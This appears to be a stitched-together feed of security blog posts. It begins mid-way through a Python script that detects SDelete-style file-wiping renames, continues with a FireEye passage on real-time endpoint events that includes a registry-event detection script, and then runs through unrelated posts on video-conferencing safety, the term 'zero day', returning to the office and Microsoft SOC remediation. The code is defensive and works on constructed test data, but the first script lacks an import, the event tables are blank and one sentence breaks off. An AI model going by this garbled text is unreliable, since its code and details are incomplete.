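from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple


@dataclass(frozen=True)
class RenameEvent:          # assumed schema, see lead-in
    timestamp: str          # "YYYY-MM-DD HH:MM:SS.mmm" UTC, sortable as text
    pid: int
    process_path: str
    old_path: str
    new_path: str


# A name made of one repeated letter, optionally with an extension of the same letter
SDELETE_NAME = re.compile(r"^([A-Z])\1*(?:\.\1+)?$")


def win_basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def sdelete_letter(path: str) -> Optional[str]:
    """Return the repeated letter if the file name looks like an SDelete rename, else None."""
    m = SDELETE_NAME.match(win_basename(path))
    return m.group(1) if m else None


def find_sdelete_chains(events: Iterable[RenameEvent], min_run: int = 10) -> List[Tuple[int, str, str, int]]:
    """Per process, walk renames in time order and count runs where the new name is
    all-'A', then all-'B', ..., each rename starting from the previous name.
    Returns (pid, process_path, original_path, run_length) for runs >= min_run."""
    by_proc: Dict[Tuple[int, str], List[RenameEvent]] = defaultdict(list)
    for e in events:
        by_proc[(e.pid, e.process_path)].append(e)
    findings = []
    for (pid, proc), evs in by_proc.items():
        evs.sort(key=lambda e: e.timestamp)
        run, expected, origin = 0, "A", ""
        for e in evs:
            letter = sdelete_letter(e.new_path)
            continues = letter == expected and (
                run == 0 or sdelete_letter(e.old_path) == chr(ord(expected) - 1))
            if continues:
                origin = e.old_path if run == 0 else origin   # remember the pre-rename name
                run, expected = run + 1, chr(ord(expected) + 1)
                continue
            if run >= min_run:
                findings.append((pid, proc, origin, run))
            # the current event may itself be the first rename of a new chain
            run, expected, origin = (1, "B", e.old_path) if letter == "A" else (0, "A", "")
        if run >= min_run:
            findings.append((pid, proc, origin, run))
    return findings


def constructed_sdelete_renames(pid: int, proc: str, original: str, ms_start: int = 351) -> List[RenameEvent]:
    """Build the 26 renames SDelete would emit for `original` (constructed test data)."""
    name = win_basename(original)
    folder = original[: len(original) - len(name)]
    stem, _, ext = name.partition(".")
    out, prev = [], original
    for i, letter in enumerate("ABCDEFGHIJKLMNOPQRSTUVWXYZ"):
        new = folder + letter * len(stem) + ("." + letter * len(ext) if ext else "")
        out.append(RenameEvent(f"2020-03-10 16:53:42.{ms_start + i:03d}", pid, proc, prev, new))
        prev = new
    return out


SDELETE_PROC = r"C:\Windows\Temp\taskassist.exe"     # SDelete masquerading, as in the post
WINWORD = r"C:\Program Files\Microsoft Office\WINWORD.EXE"
SAMPLE_EVENTS = constructed_sdelete_renames(9411, SDELETE_PROC, r"C:\Windows\Temp\WindowsServiceNT.log") + [
    RenameEvent("2020-03-10 16:55:01.000", 5120, WINWORD,
                r"C:\Users\backupadmin\Documents\report_v1.docx", r"C:\Users\backupadmin\Documents\report_v2.docx"),
    RenameEvent("2020-03-10 16:55:02.000", 5120, WINWORD,
                r"C:\Users\backupadmin\Documents\~WRD0001.tmp", r"C:\Users\backupadmin\Documents\A.A"),  # lone match, no chain
]

if __name__ == "__main__":
    for pid, proc, original, run in find_sdelete_chains(SAMPLE_EVENTS):
        print(f"pid {pid} {proc} wiped {original} ({run} successive renames)")
```

The finding carries the pre-rename path, which is the value an analyst actually wants: it names the file the attacker shredded, even though the last rename and the delete leave nothing recognisable on disk. The threshold of 10 is a trade-off; a single all-letter file name (the `A.A` event above) is normal noise, whereas anything past a handful of consecutive alphabetic renames from the same process is hard to explain innocently.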

Network Events

Incident responders rarely see evidence of network communication from historical evidence on an endpoint without enhanced logging. Usually, Mandiant relies on NetFlow data, network sensors with full or partial packet capture, or malware analysis to determine the command and control (C2) servers with which a malware sample can communicate. Our solution’s real-time network events record both local and remote network ports, the leveraged protocol, and the relevant process.

Table 7 provides an example of a real-time IPv4 network event recorded by our solution.



Timestamp (UTC):       2020-03-10 16:46:51.690
Sequence Number:
Process + Path:        C:\Windows\Temp\legitservice.exe
Local IP Address:
Local Port:
Remote IP Address:
Remote Port:

Table 7: Example real-time network connection event

Based on this real-time IPv4 network event, the malicious executable C:\Windows\Temp\legitservice.exe made an outbound TCP connection to

Registry Key Events

By using historical evidence to investigate relevant timeframes and commonly abused registry keys, we can identify malicious or leveraged keys. Real-time registry key events are useful for linking processes to the modified registry keys. They can also show when an attacker deletes or renames a registry key. This is useful to an analyst because the only available timestamp recorded in the registry is the last modified time of a registry key, and this timestamp is updated if a parent key is updated.

Table 8 provides an example of a real-time registry key event recorded by our solution.



Timestamp (UTC):       2020-03-10 16:46:56.409
Sequence Number:
Process + Path:        C:\Windows\Temp\legitservice.exe
Event Type:
Key Path:
Original Path:
Value Name:
Value Type:
Base64 Encoded Value Data:

Table 8: Example real-time registry key event

For our solution's real-time registry events, we can map the event type to the operation performed using Table 9.

Event Type Value
PostCreateKey, PostCreateKeyEx, PreCreateKeyEx

Table 9: FireEye Endpoint Security real-time registry key event types

Based on this real-time registry key event, the malicious executable C:\Windows\Temp\legitservice.exe created the Windows service LegitWindowsService. If we investigated the surrounding registry keys, we might identify even more information about this malicious service.
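Linking a registry event to its process is what makes the service creation above attributable, and the Original Path column is what exposes a rename that the registry itself never records. The following Python script is an added example, not code from the report or from FireEye Endpoint Security. It runs over constructed events shaped like Table 8, flags service keys created by a process running from a user-writable directory, and lists key renames. The key path for LegitWindowsService is assumed from the service name in the text (services live under HKLM\SYSTEM\CurrentControlSet\Services), "PostCreateKeyEx" is one of the create event types listed in Table 9, and "PostRenameKey" and the list of suspect image directories are assumptions of the example.

```python
"""Link real-time registry key events to the process that made them.

Added example, not code from the report or the product. The events are constructed
to mirror the columns of Table 8; "PostCreateKeyEx" is one of the create event types
listed in Table 9, while "PostRenameKey" is an assumed label for a rename event.
"""
import ntpath

# Create-type event names from Table 9 of the report.
CREATE_EVENT_TYPES = {"PostCreateKey", "PostCreateKeyEx", "PreCreateKeyEx"}

# Windows services are registered under this key.
SERVICES_KEY = r"HKLM\SYSTEM\CurrentControlSet\Services"

# Assumed: image directories a legitimate service installer should not run from.
SUSPECT_IMAGE_DIRS = (r"C:\Windows\Temp", r"C:\Users", r"C:\ProgramData")

SAMPLE_EVENTS = [
    # Mirrors Table 8; the key path is assumed from the service name in the text.
    {"ts": "2020-03-10 16:46:56.409", "process": r"C:\Windows\Temp\legitservice.exe",
     "type": "PostCreateKeyEx",
     "key": SERVICES_KEY + r"\LegitWindowsService", "original": ""},
    # Constructed benign record: the Service Control Manager creating a key.
    {"ts": "2020-03-10 16:47:10.120", "process": r"C:\Windows\System32\services.exe",
     "type": "PostCreateKeyEx",
     "key": SERVICES_KEY + r"\GoodSvc", "original": ""},
    # Constructed rename: Original Path holds the name before the change.
    {"ts": "2020-03-10 16:50:03.001", "process": r"C:\Windows\Temp\legitservice.exe",
     "type": "PostRenameKey",  # assumed label, not from Table 9
     "key": SERVICES_KEY + r"\LegitWindowsService2",
     "original": SERVICES_KEY + r"\LegitWindowsService"},
]


def service_name(key_path):
    """Return the service name if key_path is directly under the Services key."""
    parent, leaf = ntpath.split(key_path)
    return leaf if parent.lower() == SERVICES_KEY.lower() and leaf else None


def runs_from_suspect_dir(process_path):
    """True if the process image lives in one of the assumed user-writable directories."""
    return any(process_path.lower().startswith(d.lower() + "\\") for d in SUSPECT_IMAGE_DIRS)


def find_suspicious_service_installs(events):
    """Service keys created by processes running from user-writable locations."""
    hits = []
    for e in events:
        name = service_name(e["key"])
        if e["type"] in CREATE_EVENT_TYPES and name and runs_from_suspect_dir(e["process"]):
            hits.append((e["ts"], e["process"], name))
    return hits


def find_key_renames(events):
    """Renames are visible only in real-time events: the registry keeps no old name."""
    return [(e["ts"], e["process"], e["original"], e["key"])
            for e in events if e.get("original") and e["original"] != e["key"]]


if __name__ == "__main__":
    for ts, proc, name in find_suspicious_service_installs(SAMPLE_EVENTS):
        print("%s  service '%s' created by %s" % (ts, name, proc))
    for ts, proc, old, new in find_key_renames(SAMPLE_EVENTS):
        print("%s  %s renamed %s -> %s" % (ts, proc, old, new))
```

Matching on the parent of the key rather than a prefix keeps writes to a service's own sub-keys (Parameters, Security) out of the service-creation finding; those are better handled by a separate check keyed on the value name.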


The availability of real-time events designed for forensic analysis can fill in gaps that traditional forensic artifacts cannot on their own. Mandiant has seen great value in using real-time events during active-attacker investigations. We have used real-time events to determine the functionality of attacker utilities that were no longer present on disk, to determine users and source network addresses used during malicious remote desktop activity when expected corresponding event logs were missing, and more.

Check out our FireEye Endpoint Security page and Redline page for more information (as well as Redline on the FireEye Market), and take a FireEye Endpoint Security tour today.

From Bugs to Zoombombing: How to Stay Safe in Online Meetings

The COVID-19 pandemic, along with social distancing, has done many things to alter our lives. But in one respect it has merely accelerated a process begun many years ago. We were all spending more and more time online before the virus struck. But now, forced to work, study and socialize at home, the online digital world has become absolutely essential to our communications — and video conferencing apps have become our “face-to-face” window on the world.

The problem is that as users flock to these services, the bad guys are also lying in wait — to disrupt or eavesdrop on our chats, spread malware, and steal our data. Zoom’s problems have perhaps been the most widely publicized, because of its quickly rising popularity, but it’s not the only platform whose users have been potentially at risk. Cisco’s WebEx and Microsoft Teams have also had issues; while other platforms, such as Houseparty, are intrinsically less secure (almost by design for their target audience, as the name suggests).

Let’s take a look at some of the key threats out there and how you can stay safe while video conferencing.

What are the risks?

Depending on the platform (designed for work or play) and the use case (business or personal), there are various opportunities for the online attacker to join and disrupt or eavesdrop on video conferencing calls. The latter is especially dangerous if you’re discussing sensitive business information.

Malicious hackers may also look to deliver malware via chats or shared files to take control of your computer, or to steal your passwords and sensitive personal and financial information. In a business context, they could even try to hijack your video conferencing account to impersonate you, in a bid to steal info from or defraud your colleagues or company.

The bad guys may also be able to take advantage of the fact that your home PCs and devices are less well-secured than those at work or school—and that you may be more distracted at home and less alert to potential threats.

To accomplish their goals, malicious hackers can leverage various techniques at their disposal. These can include:

  • Exploiting vulnerabilities in the video conferencing software, particularly when it hasn’t been updated to fend off the latest threats
  • Stealing your log-ins/meeting ID via malware or phishing attacks; or by obtaining a meeting ID or password shared on social media
  • Hiding malware in legitimate-looking video apps, links and files
  • Theft of sensitive data from meeting recordings stored locally or in the cloud.

Zooming in on trouble

Zoom has in many ways become the victim of its own success. With daily meeting participants soaring from 10 million in December last year to 200 million by March 2020, all eyes have been focused on the platform. Unfortunately, that also includes hackers. Zoom has been hit by a number of security and privacy issues over the past several months, which include “Zoombombing” (meetings disrupted by uninvited guests), misleading encryption claims, a waiting room vulnerability, credential theft and data collection leaks, and fake Zoom installers. To be fair to Zoom, it has responded quickly to these issues, realigning its development priorities to fix the security and privacy issues discovered by its intensive use.

And Zoom isn’t alone. Earlier in the year, Cisco Systems had its own problem with WebEx, its widely-used enterprise video conferencing system, when it discovered a flaw in the platform that could allow a remote, unauthenticated attacker to enter a password-protected video conferencing meeting. All an attacker needed was the meeting ID and a WebEx mobile app for iOS or Android, and they could have barged in on a meeting, no authentication necessary. Cisco quickly moved to fix the high-severity vulnerability, but other flaws (also now fixed) have cropped up in WebEx’s history, including one that could enable a remote attacker to send a forged request to the system’s server.

More recently, Microsoft Teams joined the ranks of leading business videoconferencing platforms with potentially deadly vulnerabilities. On April 27 it surfaced that for at least three weeks (from the end of February till the middle of March), a malicious GIF could have stolen user data from Teams accounts, possibly across an entire company. The vulnerability was patched on April 20—but it’s a reminder to potential video conferencing users that even leading systems such as Zoom, WebEx, and Teams aren’t fool-proof and require periodic vulnerability and security fixes to keep them safe and secure. This is compounded during the COVID-19 pandemic when workers are working from home and connecting to their company’s network and systems via possibly unsecure home networks and devices.

Video conferencing alternatives

So how do you choose the best, most secure, video conferencing software for your work-at-home needs? There are many solutions on the market today. In fact, the choice can be dizzying. Some simply enable video or audio meetings/calls, while others also allow for sharing and saving of documents and notes. Some are only appropriate for one-on-one connections or small groups, while others can scale to thousands.

In short, you’ll need to choose the video conferencing solution most appropriate to your needs, while checking if it meets a minimum set of security standards for working at home. This set of criteria should include end-to-end encryption, automatic and frequent security updates, the use of auto-generated meeting IDs and strong access controls, a program for managing vulnerabilities, and last but not least, good privacy practices by the company.

Some video conferencing options alongside Zoom, WebEx, and Teams include:

  • Signal, which is end-to-end encrypted and highly secure, but only supports one-to-one calls.
  • FaceTime, Apple’s video chat tool, is easy-to-use and end-to-end encrypted, but is only available to Mac and iOS users.
  • Jitsi Meet is a free, open-source video conferencing app that works on Android, iOS, and desktop devices, with no limit on participants beyond your bandwidth.
  • Skype Meet Now is Microsoft’s free, popular conferencing tool for up to 50 users that can be used without an account (in contrast to Teams, which is a paid, more business-focused platform for Office 365 users).
  • Google Duo is a free option for video calls only, while the firm’s Hangouts platform can also be used for messaging. Hangouts Meet is a more business-focused paid version.
  • is a well-known telemedicine platform used by doctors and therapists that works through your browser—so it’s up to you to keep your browser updated and to ensure the appropriate security and privacy settings are in place. Secure medical consultation with your healthcare provider is of particular concern during the shelter- and work-from-home quarantine.

How do I stay safe?

Whatever video conferencing platform you use, it’s important to bear in mind that cyber-criminals will always be looking to take advantage of any security gaps they can find — in the tool itself or your use of it. So how do you secure your video conferencing apps? Some tips listed here are Zoom-specific, but consider their equivalents in other platforms as general best-practice tips. Depending on the use case, you might choose to not enable some of the options here.

  • Check for end-to-end encryption before getting onboard with the app. This includes encryption for data at rest.
  • Ensure that you generate one-off meeting IDs and passwords automatically for recurring meetings (Zoom).
  • Don’t share any meeting IDs online.
  • Use the “waiting room” feature in Zoom (now fixed), so the host can only allow attendees from a pre-assigned list.
  • Lock the meeting once it’s started to stop anyone new from joining.
  • Allow the host to put attendees on hold, temporarily removing them from a meeting if necessary.
  • Play a sound when someone enters or leaves the room.
  • Set screen-sharing to “host only” to stop uninvited guests from sharing disruptive content.
  • Disable “file transfers” to block possible malware.
  • Keep your systems patched and up-to-date so there are no bugs that hackers can target.
  • Only download conferencing apps from official iOS/Android stores and manufacturer websites.
  • Never click on links or open attachments in unsolicited mail.
  • Check the settings in your video conferencing account. Switch off camera access if you don’t want to appear on-screen.
  • Use a password manager for video conferencing app log-ins.
  • Enhance passwords with two-factor authentication (2FA) or Single-Sign-On (SSO) to protect access, if available.
  • Install anti-malware software from a reputable vendor on all devices and PCs. And implement a network security solution if you can.

How Trend Micro can help

Fortunately, Trend Micro has a range of capabilities that can support your efforts to stay safe while using video conferencing services.

Trend Micro Home Network Security (HNS) protects every device in your home connected to the internet. That means it will protect you from malicious links and attachments in phishing emails spoofed to appear as if sent from video conferencing firms, as well as from those sent by hackers that may have covertly entered a meeting. Its Vulnerability Check can identify any vulnerabilities in your home devices and PCs, including work laptops, and its Remote Access Protection can reduce the risk of tech support scams and unwanted remote connections to your device. Finally, it allows parents to control their kids’ usage of video conferencing applications, to limit their exposure.

Trend Micro Security also offers protection against email, file, and web threats on your devices. Note too, that Password Manager is automatically installed with Maximum Security to help users create unique, strong passwords for each application/website they use, including video conferencing sites.

Finally, Trend Micro WiFi Protection (multi-platform) / VPN Proxy One (Mac and iOS) offer VPN connections from your home to the internet, creating secure encrypted tunnels for traffic to flow down. The VPN apps work on both Wi-Fi and Ethernet connections. This could be useful for users concerned their video conferencing app isn’t end-to-end encrypted, or for those wishing to protect their identity and personal information when interacting on these apps.

The post From Bugs to Zoombombing: How to Stay Safe in Online Meetings appeared first on .

What the hell does “zero day” even mean anymore?

I seem to have spent a fair amount of my time recently talking to a variety of people about “zero days” and the one thing that has really struck me is that almost everyone has a different view on what a “zero day” actually is, so I figured the time had come to try and add a little clarity to the situation.

For those of you really short on time, let’s be clear – zero days do exist, and they can be highly damaging, but there are many other things that are both easier to fix and offer a greater return on investment for most organizations. So, step 1 should be to fix things like patching and user education before devoting limited resources to the genuinely tiny minority of true zero day attacks.

And for those of you with a little more time on your hands, let’s examine why that last paragraph recommends what it does. First things first, we should talk about vulnerabilities and exploits because whilst the two are clearly linked they are, of course, very different. In simple terms a vulnerability is a weakness or error in a piece of code. An exploit is a separate piece of code that takes advantage of that vulnerability to enable the bad guys to achieve their goals.

The term “zero day” is valid in both contexts. It’s typically used in reference to an exploit – but not always – and in my experience, that creates some of the confusion. As a side note, in the fast-moving world of IT security and malware, confusion among security teams can only ever be a bad thing for those of us working hard to stop the bad guys from profiting. I will try to be clear in which context I’m using it throughout this blog.

So, let’s take a look at some of the more common interpretations of “zero day” and examine which ones are valid:

1) “No signature exists in my current antivirus so it can’t detect this ‘zero day’ malware.”

There are more than 725,000 new malware files released each day, but the vast majority of this is simply recompiled versions of existing malware with a new file hash. A new hash does not equal zero day malware.

2) “I’ve never seen a piece of malware get delivered like that before”

Cyber criminals are always looking for a new way to deliver their payloads and they can be pretty creative, but the moniker zero day should be reserved for malware itself and not the method of distribution.

3) “There is a vulnerability in my system which I haven’t yet got around to patching.”

There are many reasons why patches are not always immediately applied (some of them are even acceptable!) but if a piece of malware ends up exploiting a known and unpatched vulnerability, that doesn’t retroactively turn this (possibly quite old) piece of malware into a zero day version.

4) “There is a whole new type of malware”

This must surely count as a ‘zero day’ right? I’m going to argue that it doesn’t. A new type of malware is likely to mean the cyber criminals have different goals. When crypto-malware (or ransomware as it’s commonly known) began to hit people in force, this indicated that the bad guys had come up with a new way to make money – extortion. But the vulnerabilities being exploited to execute their code and the mechanisms of delivering that code to their victims’ machines were the same as before….and on that basis I wouldn’t count it as ‘zero day’.

5) “I’m aware of a newly discovered vulnerability but there is no patch currently available to fix it” (or potentially such a recent patch that there has not been an opportunity to test it within my organization)

In reality this is a rare event. However, I would argue that when no patch is available, and therefore there is no way to update systems to protect against the vulnerability, this can be considered a ‘zero-day’ vulnerability.

6) “An unknown vulnerability has been discovered and exploited by the bad guys”

In this example nobody except the cyber criminals is even aware a vulnerability exists – and therefore nobody is even trying to fix it. THIS is a true ‘zero day’ threat. Fortunately, though, they are actually pretty rare.

So, what does all this mean from a security perspective?

That’s going to be the subject of my next blog, so watch this space…..

The post What the hell does “zero day” even mean anymore? appeared first on McAfee Blogs.

Back to Work After Lockdown: Cyber Risks of the Post-Pandemic Era

In the wake of China lifting some of its lockdown restrictions in the Wuhan province, most of the world is looking forward to getting back to ‘normal’. According to the World Health Organization, this transition from government-enforced lockdown to a quasi-repose state, should not be taken lightly nor perceived as a callback to ‘normalcy’.

As many epidemiologists pointed out, we have yet to reach the ‘infection’ peak, meaning that a second viral wave may be lurking around the corner. In the interim, with several European countries dropping part of the lockdown-specific rules, company-owners are making the necessary preparations to accommodate all the employees who were sent to work from home.

Many challenges lie ahead, most being related to (re)constructing a (the) work environment and how to achieve total compliance with the governmental recommendations/regulations – which literally translates to how to keep your employees safe in the ‘Post-Pandemic Era’. The quotation marks are not poetic license – the coronavirus pandemic is far from over and it’s important to keep that in mind when you begin drafting the plans on how to bring everyone back to the office.

There is another consideration – your company’s cybersecurity factor. Up until now, your sysadmins were focused on making telecommuting work – configuring the network, installing additional equipment, researching remote work-specific software.

However, now that the employees will be returning to the office, the focus must shift back to on-site network administration, which, among other things, means getting up to speed with your cybersecurity policies (or lack thereof).

In this article, I am going to go over Heimdal™ Security’s return-to-the-office, cybersecurity recommendations. And because this is a race against time, I’m going to show you how to cut some corners (not in a bad way).

The post-pandemic era office

It’s only natural to have some reservations about going back to the office. After all, we did spend the last couple of months being told to stay at home, wash our hands, and practice social distancing. The idea of heading back to the office, while the coronavirus is still active, may seem foreboding. Perhaps even confusing – how can we even think about venturing into the world when the authorities are still struggling to contain COVID hotbeds that appear overnight?

Some WHO-associated sources mentioned something about the ‘death of normalcy’. In other words, we can never go back to what we believed was ‘normal’ because the very idea of ‘commonplaceness’ is what led us to this conundrum.

We need to change and that’s a fact. ‘But how?’ is the question du jour. Do we simply go back to our regular, and very mundane, 9-to-5 lives, knowing that the virus is still around? There’s no doubt that all of these are legitimate questions, which I will be addressing throughout this article.

Is it safe to go back to work? Health authorities from around the globe have already begun loosening the lockdown restrictions, allowing some industries to resume production. For instance, the Spanish health authorities, partly encouraged by the decrease in new coronavirus cases/casualties, have cleared the ‘restart’ for the construction and manufacturing industries.

On Monday, by ministerial decree, workers employed in these two sectors will return to work. I would like to remind the readers that Spain has been under lockdown since the middle of March.

Moreover, Spain is ranked fourth in deaths caused by the new coronavirus, after the United States, UK, and Italy. It’s encouraging news indeed, considering how hard this country was hit. Spain is not the only country to loosen its lockdown restrictions to stabilize the economy.

On the 25th of April, three US states (Georgia, Alaska, and Oklahoma) took the first steps in loosening some of the lockdown orders, despite the US death toll being around 70,000 and climbing. Even life in China, which is considered the first coronavirus hotbed, is slowly returning to normal, with more businesses relaunching every single day.

Returning to the office is possible and feasible. However, it will look entirely different compared to what your employees had in mind.

First of all, as an employer, you are bound by law to take every necessary step to ensure the safety of your workforce and help the health authorities stem the spread of this contagion. So, right from the start, two aspects need to be tackled: legal and health-related. Of course, an equally important aspect is cybersecurity. Let’s take a closer look at each of them.

Legal Implications of Returning to Work

According to the White House officials, employers can recall the staff on premises if they meet all the requirements laid down and enforced by federal, state, and local officials. The document in question is broken down into several sections, each of them addressing a certain social category (healthcare providers, employers, employees, specific employees, and businesses). Below, you will find an excerpt from the White House’s tri-phase plan.

Guidelines for all phases


“Develop and implement appropriate policies, per Federal, State, and local regulations and guidance, and informed by industry best practices, regarding:

  • Social distancing and protective equipment
  • Temperature checks
  • Sanitation
  • Use and disinfection of common and high-traffic areas
  • Business travel

Monitor the workforce for indicative symptoms. Do not allow symptomatic people to physically return to work until cleared by a medical provider.

Develop and implement policies and procedures for workforce contact tracing following employee COVID + test.”

Source: White House Gov – Opening America (Guidelines)

The European Union has also laid down strict guidelines regarding how employers should (re)act when recalling employees. According to the OSHwiki, the EU’s plan for reopening businesses focuses on:

  1. Minimizing exposure to COVID-19 after recalling employees,
  2. Updating your company’s risk assessment plan[i];
  3. Adapting the environment’s layout as to comply with the health authorities’ recommendations regarding social distancing and other health-related concerns;
  4. Identifying employees that are in the high-risk groups and creating a hazard-free work environment[ii];
  5. Maintaining communication with your occupational health service;
  6. Miscellaneous measures that can help your workforce cope with the changes produced by the coronavirus outbreak (i.e. a counselor to help your employees overcome anxiety, or depression, as side-effects of long-term isolation).

The same document also provides some insight on telework – bringing everybody back to the office at once would violate the social distancing rule. The obvious solution would be to allow some of your employees to continue working from home. In the long run, you can work out a rotation-based schedule to get everyone back.


Cybersecurity concerns in the Post-Pandemic Era

In terms of cybercrime, the coronavirus did nothing to stop or at least dilute the number of cyberattacks. Although in some countries the healthcare system is on the brink of collapse, that did not stop malicious actors from taking advantage of the confusion to stage debilitating ransomware attacks. The oil industry has also been targeted, as well as SMBs that fast-tracked the remote work initiative while sacrificing their cybersecurity posture.

Because I do a lot of research in the cyber-resilience area, I usually come across various forums where sysadmins ask all kinds of security-related questions. In one thread, there was this sysadmin who said that his CEO ordered him to give every employee admin-type privileges before sending them to work from home. Needless to say, this type of practice can lead to all manner of entanglements, not to mention the fact that you would be offering hackers several access points for data exfiltration.

This should not be construed merely as typical corona-related behavior; it goes further than that. Oftentimes, decision-makers who lack cybersecurity training will make the mistake of overruling the sysadmin’s decisions in the area of security. A grave mistake, indeed, one that can cost companies millions of dollars.

Consider an alternative scenario – a lack of funding. An expanding startup just doesn’t have the financial means to secure all the vital areas, leaving sysadmins to work with the tools they have on hand. Take patching, for instance. Nobody gives patching any attention until the company reaches the 20+ endpoint milestone. Then it becomes problematic, especially when there is only one sysadmin. What happens after that?

System administrators will use automatic patching and deployment solutions like WSUS and SCCM to ensure that all endpoints are running the latest Windows versions or that the proprietary software has been patched.

Even when you’re overseeing a 20+ endpoint network, using either one of those can create more issues than it solves. This is not me putting the kibosh on Microsoft’s auto-patching, management, and deployment software, but, considering the speed that was required to set up a stable remote work network, SCCM and WSUS are simply not feasible.

Readers should remember that more than 80% of a machine’s vulnerabilities can be fixed through patching. Right now, the emphasis is on automatic tools that can deploy patches and updates on the fly.

Heimdal™ Security’s Thor Premium Enterprise, our company’s unique threat-hunting, and vulnerability remediation solution can help your sysadmin deploy updates and patches from anywhere in the world. Thor Premium Enterprise is a cloud-native solution, which means that you won’t have to worry about saving those patches/updates locally before they are applied.

Furthermore, on-demand, you can also add Infinity Management to your Thor Premium Enterprise suite. IM provides you with granular control over your endpoints and, most importantly, over what kind of software was installed on those machines. From there, you can force-install applications, roll back to a previous version, deploy and install proprietary software\update\patches, and much more.


Back to work in the Post-Pandemic era? It is possible, but we need to follow some rules. As a company-owner, you have to guarantee the safety of your employees, no matter if it’s related to health or cybersecurity.

One sensible step towards reopening your business would be to work with the local authorities to make sure you meet all the requirements. Furthermore, you should also offer some degree of flexibility. Perhaps not all of your employees are thrilled at the thought of going back to the office, considering that the coronavirus pandemic is far from over. Be mindful of your employees’ wishes and work with them to come up with the best solution.

[i] A company-wide analysis that must include a risk evaluation paper, risk control, safety measures, mitigation, risk management tools, and training.

[ii] If your office cannot guarantee the safety of your high-risk employees during regular office hours, it’s advisable to allow them to continue working from a home-type environment.

The post Back to Work After Lockdown: Cyber Risks of the Post-Pandemic Era appeared first on Heimdal Security Blog.

Lessons learned from the Microsoft SOC—Part 3c: A day in the life part 2

This is the sixth blog in the Lessons learned from the Microsoft SOC series designed to share our approach and experience from the front lines of our security operations center (SOC) protecting Microsoft and our Detection and Response Team (DART) helping our customers with their incidents. For a visual depiction of our SOC philosophy, download our Minutes Matter poster.

COVID-19 and the SOC

Before we conclude the day in the life, we thought we would share an analyst’s eye view of the impact of COVID-19. Our analysts are mostly working from home now and our cloud based tooling approach enabled this transition to go pretty smoothly. The differences in attacks we have seen are mostly in the early stages of an attack with phishing lures designed to exploit emotions related to the current pandemic and increased focus on home firewalls and routers (using techniques like RDP brute-forcing attempts and DNS poisoning—more here). The attack techniques they attempt to employ after that are fairly consistent with what they were doing before.

A day in the life—remediation

When we last left our heroes in the previous entry, our analyst had built a timeline of the potential adversary attack operation. Of course, knowing what happened doesn’t actually stop the adversary or reduce organizational risk, so let’s remediate this attack!

  1. Decide and act—As the analyst develops a high enough level of confidence that they understand the story and scope of the attack, they quickly shift to planning and executing cleanup actions. While this appears as a separate step in this particular description, our analysts often execute on cleanup operations as they find them.

Big Bang or clean as you go?

Depending on the nature and scope of the attack, analysts may clean up attacker artifacts as they go (emails, hosts, identities) or they may build a list of compromised resources to clean up all at once (Big Bang).

  • Clean as you go—For most typical incidents that are detected early in the attack operation, analysts quickly clean up the artifacts as we find them. This rapidly puts the adversary at a disadvantage and prevents them from moving forward with the next stage of their attack.
  • Prepare for a Big Bang—This approach is appropriate for a scenario where an adversary has already “settled in” and established redundant access mechanisms to the environment (frequently seen in incidents investigated by our Detection and Response Team (DART) at customers). In this case, analysts should avoid tipping off the adversary until all attacker presence has been discovered, as surprise can help with fully disrupting their operation. We have learned that partial remediation often tips off an adversary, which gives them a chance to react and rapidly make the incident worse (spread further, change access methods to evade detection, inflict damage/destruction for revenge, cover their tracks, etc.). Note that cleaning up phishing and malicious emails can often be done without tipping off the adversary, but cleaning up host malware and reclaiming control of accounts has a high chance of tipping off the adversary.

These are not easy decisions to make, and we have found no substitute for experience in making these judgement calls. The collaborative work environment and culture we have built in our SOC helps immensely, as our analysts can tap into each other’s experience to help make these tough calls.

The specific response steps are very dependent on the nature of the attack, but the most common procedures used by our analysts include:

  • Client endpoints—SOC analysts can isolate a computer and contact the user directly (or IT operations/helpdesk) to have them initiate a reinstallation procedure.
  • Server or applications—SOC analysts typically work with IT operations and/or application owners to arrange rapid remediation of these resources.
  • User accounts—We typically reclaim control of these by disabling the account and resetting the password for compromised accounts (though these procedures are evolving, as a large number of our users are mostly passwordless using Windows Hello or another form of MFA). Our analysts also explicitly expire all authentication tokens for the user with Microsoft Cloud App Security.
    Analysts also review the multi-factor phone number and device enrollment to ensure it hasn’t been hijacked (often contacting the user), and reset this information as needed.
  • Service Accounts—Because of the high risk of service/business impact, SOC analysts work with the service account owner of record (falling back on IT operations as needed) to arrange rapid remediation of these resources.
  • Emails—The attack/phishing emails are deleted (and sometimes purged to prevent recovery of deleted emails), but we always save a copy of the original email in the case notes for later search and analysis (headers, content, scripts/attachments, etc.).
  • Other—Custom actions can also be executed based on the nature of the attack such as revoking application tokens, reconfiguring servers and services, and more.

Automation and integration for the win

It’s hard to overstate the value of integrated tools and process automation, as these bring so many benefits—improving the analysts’ daily experience and improving the SOC’s ability to reduce organizational risk.

  • Analysts spend less time on each incident, reducing the attacker’s time to operation—measured by mean time to remediate (MTTR).
  • Analysts aren’t bogged down in manual administrative tasks so they can react quickly to new detections (reducing mean time to acknowledge—MTTA).
  • Analysts have more time to engage in proactive activities that both reduce organization risk and increase morale by keeping them focused on the mission.

Our SOC has a long history of developing our own automation and scripts, through a dedicated automation team in our SOC, to make analysts’ lives easier. Because custom automation requires ongoing maintenance and support, we are constantly looking for ways to shift automation and integration to capabilities provided by Microsoft engineering teams (which also benefits our customers). While still early in this journey, this approach typically improves the analyst experience and reduces maintenance effort and challenges.

This is a complex topic that could fill many blogs, but it takes two main forms:

  • Integrated toolsets save analysts manual effort during incidents by allowing them to easily navigate multiple tools and datasets. Our SOC relies heavily on the integration of Microsoft Threat Protection (MTP) tools for this experience, which also saves the automation team from writing and supporting custom integration for this.
  • Automation and orchestration capabilities reduce manual analyst work by automating repetitive tasks and orchestrating actions between different tools. Our SOC currently relies on an advanced custom SOAR platform and is actively working with our engineering teams (MTP’s AutoIR capability and Azure Sentinel SOAR) on how to shift our learnings and workload onto those capabilities.

After the attacker operation has been fully disrupted, the analyst marks the case as remediated, which is the timestamp signaling the end of MTTR measurement (which started when the analyst began the active investigation in step 2 of the previous blog).

While having a security incident is bad, having the same incident repeated multiple times is much worse.

  1. Post-incident cleanup—Because lessons aren’t actually “learned” unless they change future actions, our analysts always integrate any useful information learned from the investigation back into our systems. Analysts capture these learnings so that we avoid repeating manual work in the future and can rapidly see connections between past and future incidents by the same threat actors. This can take a number of forms, but common procedures include:
